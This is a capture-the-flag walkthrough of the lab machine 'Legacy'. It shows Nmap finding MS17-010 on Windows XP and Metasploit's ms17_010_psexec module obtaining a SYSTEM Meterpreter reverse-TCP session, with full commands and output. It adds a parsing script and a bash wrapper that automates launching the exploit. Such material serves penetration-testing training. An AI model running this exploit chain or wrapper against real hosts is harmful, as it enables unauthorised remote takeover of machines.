Legacy is another beginner-friendly box. The task is to enumerate the target with Nmap and then exploit it with Metasploit.
Step 1: Enumerate with Nmap
We start by enumerating the target with Nmap. The smb\* wildcard runs every SMB NSE script against the host, and -Pn skips host discovery and treats the address as up.
➜ legacy nmap -A -v 10.129.227.181 --script smb\* -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-22 17:21 EST
NSE: Loaded 81 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:21
Completed NSE at 17:21, 0.00s elapsed
Initiating NSE at 17:21
Completed NSE at 17:21, 0.00s elapsed
Initiating NSE at 17:21
Completed NSE at 17:21, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:21
Completed Parallel DNS resolution of 1 host. at 17:21, 0.00s elapsed
Initiating Connect Scan at 17:21
Scanning 10.129.227.181 [1000 ports]
Discovered open port 139/tcp on 10.129.227.181
Discovered open port 135/tcp on 10.129.227.181
Discovered open port 445/tcp on 10.129.227.181
Completed Connect Scan at 17:21, 0.46s elapsed (1000 total ports)
Initiating Service scan at 17:21
Scanning 3 services on 10.129.227.181
Completed Service scan at 17:21, 6.12s elapsed (3 services on 1 host)
NSE: Script scanning 10.129.227.181.
Initiating NSE at 17:21
Completed NSE at 17:26, 298.15s elapsed
Initiating NSE at 17:26
Stats: 0:05:05 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 10 (10 waiting)
NSE Timing: About 44.44% done; ETC: 17:26 (0:00:01 remaining)
Completed NSE at 17:28, 90.01s elapsed
Initiating NSE at 17:28
NSE Timing: About 12.50% done; ETC: 17:32 (0:03:37 remaining)
Completed NSE at 17:29, 36.47s elapsed
Nmap scan report for 10.129.227.181
Host is up (0.025s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_smb-flood: ERROR: Script execution failed (use -d to debug)
| smb-psexec: Can't find the service file: nmap_service.exe (or nmap_service).
| Due to false positives in antivirus software, this module is no
| longer included by default. Please download it from
| https://nmap.org/psexec/nmap_service.exe
|_and place it in nselib/data/psexec/ under the Nmap DATADIR.
| smb-brute:
|_ No accounts found
|_smb-print-text: false
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-mbenum:
| Master Browser
| LEGACY 5.1
| Potential Browser
| LEGACY 5.1
| Server service
| LEGACY 5.1
| Windows NT/2000/XP/2003 server
| LEGACY 5.1
| Workstation
|_ LEGACY 5.1
|_smb2-capabilities: SMB 2+ not supported
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-protocols:
| dialects:
|_ NT LM 0.12 (SMBv1) [dangerous, but default]
NSE: Script Post-scanning.
Initiating NSE at 17:29
Completed NSE at 17:29, 0.00s elapsed
Initiating NSE at 17:29
Completed NSE at 17:29, 0.00s elapsed
Initiating NSE at 17:29
Completed NSE at 17:29, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 431.52 seconds
The smb-vuln-ms17-010 script reports the host as VULNERABLE to MS17-010 (CVE-2017-0143), and the rest of the output explains why that is plausible: the target identifies itself as Windows XP (LEGACY 5.1 in the browser listing), negotiates only the SMBv1 dialect NT LM 0.12, and rejects every SMBv2 probe. Note that the smb\* wildcard also ran smb-brute, smb-flood and smb-psexec, which are noisy and account for most of the 431 seconds; a targeted rescan such as nmap -p139,445 -Pn --script smb-vuln-ms17-010,smb-os-discovery,smb-protocols gives the same answer in a fraction of the time. Let's open Metasploit and see which modules it has for MS17-010.
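Reading a seven-minute scan by eye is error prone. The following bash script, added here as an example and not part of the original writeup, extracts the triage facts from Nmap's normal text output: which smb-vuln-* checks reported a verdict, the CVE identifiers, whether only SMBv1 is offered, and the OS hint. The sample input is an excerpt constructed from the scan output above; the function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): pull the triage facts out of
# Nmap's normal text output so a long "--script smb*" run does not have to be
# read line by line. Every function reads the scan text on stdin.

# Constructed sample: an excerpt of the scan output shown above, with the
# leading spaces Nmap prints inside "|" blocks restored.
SAMPLE='PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_smb2-capabilities: SMB 2+ not supported
| smb-protocols: 
|   dialects: 
|_    NT LM 0.12 (SMBv1) [dangerous, but default]'

# One "script<TAB>state" line per smb-vuln-* check. A check that found nothing
# prints a bare "false" on a single line; a positive finding opens a block
# whose "State:" line carries the verdict.
vuln_states() {
    awk '
        /^[|] *smb-vuln-[^:]+: *$/ {
            s = $0; sub(/^[|] */, "", s); sub(/:.*$/, "", s); script = s; next
        }
        /^[|]_ *smb-vuln-[^:]+: *(true|false) *$/ {
            s = $0; sub(/^[|]_ */, "", s); split(s, a, ": *")
            printf "%s\t%s\n", a[1], (a[2] == "false" ? "NOT_VULNERABLE" : "VULNERABLE"); next
        }
        script != "" && /^[|] *State: / {
            s = $0; sub(/^[|] *State: */, "", s); printf "%s\t%s\n", script, s; script = ""
        }
    '
}

# CVE identifiers mentioned anywhere in the report, de-duplicated.
cve_ids() {
    grep -o 'CVE-[0-9]\{4\}-[0-9]\{4,\}' | sort -u
}

# True when the host offers only SMBv1, the protocol MS17-010 lives in.
smbv1_only() {
    local text; text=$(cat)
    printf '%s\n' "$text" | grep -q 'SMB 2+ not supported' &&
        printf '%s\n' "$text" | grep -q 'NT LM 0.12 (SMBv1)'
}

# Human-readable summary; exit status 0 when at least one check is VULNERABLE,
# so the function can gate the next step of a pipeline.
triage() {
    local text os; text=$(cat)
    os=$(printf '%s\n' "$text" | sed -n 's/^Service Info: OSs: \([^;]*\);.*/\1/p')
    printf 'OS hint : %s\n' "${os:-unknown}"
    if printf '%s\n' "$text" | smbv1_only; then
        printf 'SMB     : SMBv1 only\n'
    else
        printf 'SMB     : SMB2+ available\n'
    fi
    printf '%s\n' "$text" | vuln_states | while IFS=$'\t' read -r script state; do
        printf 'Check   : %-20s %s\n' "$script" "$state"
    done
    printf 'CVEs    : %s\n' "$(printf '%s\n' "$text" | cve_ids | tr '\n' ' ')"
    printf '%s\n' "$text" | vuln_states | grep -q $'\tVULNERABLE$'
}

# Usage: nmap -A -Pn --script smb\* 10.129.227.181 | triage   (or feed a saved -oN file)
printf '%s\n' "$SAMPLE" | triage
```

The functions are deliberately split so that vuln_states alone can feed a loop over many hosts, while triage's exit status lets a wrapper decide whether the exploitation step is worth attempting at all.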
Step 2: Exploiting the Target with Metasploit
➜ legacy msfconsole
=[ metasploit v6.2.37-dev- ]
+ -- --=[ 2277 exploits - 1194 auxiliary - 408 post ]
+ -- --=[ 948 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View advanced module options with advanced
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search ms17-010
Matching Modules
================
   #  Name                                       Disclosure Date  Rank     Check  Description
   -  ----                                       ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue   2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec        2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command       2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                          normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce   2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
We search for ms17-010 and are presented with several modules. Module 3 (auxiliary/scanner/smb/smb_ms17_010) only re-confirms what the Nmap script already told us, and module 0 (ms17_010_eternalblue) has no Windows XP target; its Metasploit implementation is written for Windows 7 / Server 2008 R2 class kernels. Module 1, ms17_010_psexec, uses the EternalRomance/EternalSynergy/EternalChampion transaction technique, which does work against this 32-bit XP host, and after trying each it is the one that makes progress. Selecting by index (use 1) is fine interactively, but the numbering depends on the search results, so in a script use the full module name.
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                              Required  Description
   ----                  ---------------                                                              --------  -----------
   DBGTRACE              false                                                                        yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                                           yes       How many times to try to leak transaction
   NAMEDPIPE                                                                                          no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445                                                                          yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                                                                no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                               no        The service display name
   SERVICE_NAME                                                                                       no        The service name
   SHARE                 ADMIN$                                                                       yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                                            no        The Windows domain to use for authentication
   SMBPass                                                                                            no        The password for the specified username
   SMBUser                                                                                            no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.173    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 10.129.227.181
rhosts => 10.129.227.181
msf6 exploit(windows/smb/ms17_010_psexec) > set lhost 10.10.14.86
lhost => 10.10.14.86
msf6 exploit(windows/smb/ms17_010_psexec) > run
We supply the two values the module cannot guess, RHOSTS (the target) and LHOST, and run the exploit. LHOST has to be changed from the default 192.168.0.173, the local LAN interface, to 10.10.14.86, the VPN tunnel address the target can reach back to; with the wrong LHOST the exploit would still fire but no session would ever connect. No SMBUser/SMBPass is set, because the module can reach a named pipe on this host anonymously. The first several attempts fail, but look at the error: Rex::ConnectionTimeout on 10.129.227.181:445 means the TCP connection to the SMB port never completed, so the exploit logic never ran. That is a reachability problem (the target or the VPN path not answering), not the exploit being flaky; ms17_010_psexec is generally regarded as the stable MS17-010 module once it can connect. Re-running until port 445 answers gets us through:
[*] Started reverse TCP handler on 10.10.14.86:4444
[-] 10.129.227.181:445 - Rex::ConnectionTimeout: The connection with (10.129.227.181:445) timed out.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.10.14.86:4444
[-] 10.129.227.181:445 - Rex::ConnectionTimeout: The connection with (10.129.227.181:445) timed out.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.10.14.86:4444
[-] 10.129.227.181:445 - Rex::ConnectionTimeout: The connection with (10.129.227.181:445) timed out.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.86:4444
[-] 10.129.227.181:445 - Rex::ConnectionTimeout: The connection with (10.129.227.181:445) timed out.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.86:4444
[-] 10.129.227.181:445 - Rex::ConnectionTimeout: The connection with (10.129.227.181:445) timed out.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.86:4444
[*] 10.129.227.181:445 - Target OS: Windows 5.1
[*] 10.129.227.181:445 - Filling barrel with fish... done
[*] 10.129.227.181:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.129.227.181:445 - [*] Preparing dynamite...
[*] 10.129.227.181:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.129.227.181:445 - [+] Successfully Leaked Transaction!
[*] 10.129.227.181:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.129.227.181:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.129.227.181:445 - Reading from CONNECTION struct at: 0x86470010
[*] 10.129.227.181:445 - Built a write-what-where primitive...
[+] 10.129.227.181:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.129.227.181:445 - Selecting native target
[*] 10.129.227.181:445 - Uploading payload... gaMcqsAw.exe
[*] 10.129.227.181:445 - Created \gaMcqsAw.exe...
[+] 10.129.227.181:445 - Service started successfully...
[*] Sending stage (175686 bytes) to 10.129.227.181
[*] 10.129.227.181:445 - Deleting \gaMcqsAw.exe...
[*] Meterpreter session 1 opened (10.10.14.86:4444 -> 10.129.227.181:1032) at 2023-01-22 17:33:01 -0500
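The six manual re-runs above all failed the same way, with a connection timeout before any exploit traffic was sent. The following bash wrapper, added here as an example and not part of the original walkthrough or of Metasploit, waits until TCP/445 on the target actually accepts a connection (a bounded number of attempts) and only then launches msfconsole with a resource script that sets the module, RHOSTS and LHOST exactly as above. The module and option names are the ones shown in the msfconsole output; the attempt counts, timeouts, the .rc path and the dotted-quad check are this example's own choices.

```shell
#!/usr/bin/env bash
# Added example, not part of the original walkthrough or of Metasploit: wait
# until TCP/445 on the target actually accepts a connection, then drive
# msfconsole from a resource script so every run sets the same module and
# options. Needs bash (for /dev/tcp) and coreutils timeout; attempt counts,
# timeouts and the .rc path are this example's own choices.

# True when host:port accepts a TCP connection within $3 seconds.
tcp_open() {
    local host=$1 port=$2 secs=${3:-3}
    timeout "$secs" bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
}

# Poll tcp_open up to $3 times, sleeping $4 seconds between tries. This is
# the check the repeated "run" attempts above were missing: a
# Rex::ConnectionTimeout on 445 means nothing the module does afterwards matters.
wait_for_port() {
    local host=$1 port=$2 tries=${3:-5} pause=${4:-5} i
    for ((i = 1; i <= tries; i++)); do
        if tcp_open "$host" "$port" 3; then
            echo "[+] $host:$port reachable (attempt $i)"
            return 0
        fi
        echo "[-] $host:$port not answering (attempt $i/$tries)"
        sleep "$pause"
    done
    return 1
}

# Resource script for exploit/windows/smb/ms17_010_psexec. Using the full
# module name rather than "use 1" avoids depending on search-result ordering.
build_rc() {
    local rhost=$1 lhost=$2 lport=${3:-4444}
    cat <<EOF
use exploit/windows/smb/ms17_010_psexec
set RHOSTS $rhost
set LHOST $lhost
set LPORT $lport
set payload windows/meterpreter/reverse_tcp
run
EOF
}

# Dotted-quad sanity check so a typo does not turn into an exploit attempt
# against an unintended host.
is_ipv4() {
    local a b c d o re='^[0-9]{1,3}$'
    IFS=. read -r a b c d <<<"$1"
    for o in "$a" "$b" "$c" "$d"; do
        [[ $o =~ $re ]] && [ "$o" -le 255 ] || return 1
    done
}

main() {
    local rhost=$1 lhost=$2 rc=${TMPDIR:-/tmp}/ms17_010_psexec.rc
    if ! is_ipv4 "$rhost" || ! is_ipv4 "$lhost"; then
        echo "usage: $0 RHOST LHOST" >&2; return 2
    fi
    # Six tries, ten seconds apart: about a minute before giving up.
    if ! wait_for_port "$rhost" 445 6 10; then
        echo "[-] giving up: 445/tcp never answered" >&2; return 1
    fi
    build_rc "$rhost" "$lhost" > "$rc"
    msfconsole -q -r "$rc"
}

# e.g. ./ms17_010_run.sh 10.129.227.181 10.10.14.86
if [ "$#" -eq 2 ]; then
    main "$@"
fi
```

Keeping the pre-flight check separate from the resource script also makes the failure mode legible: "445/tcp never answered" points at the VPN or the target, whereas a module error after a successful connect points at the exploit itself.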
Once the connection goes through, the exploit succeeds on the first leak attempt and the module itself reports "SYSTEM session obtained!". We confirm which account the Meterpreter session is actually running as:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
NT AUTHORITY\SYSTEM is the LocalSystem account, a step above a local administrator, so there is no privilege escalation phase on this box. All that remains is to collect the flags from the user desktops; on Windows XP the profiles live under C:\Documents and Settings\<user>\Desktop.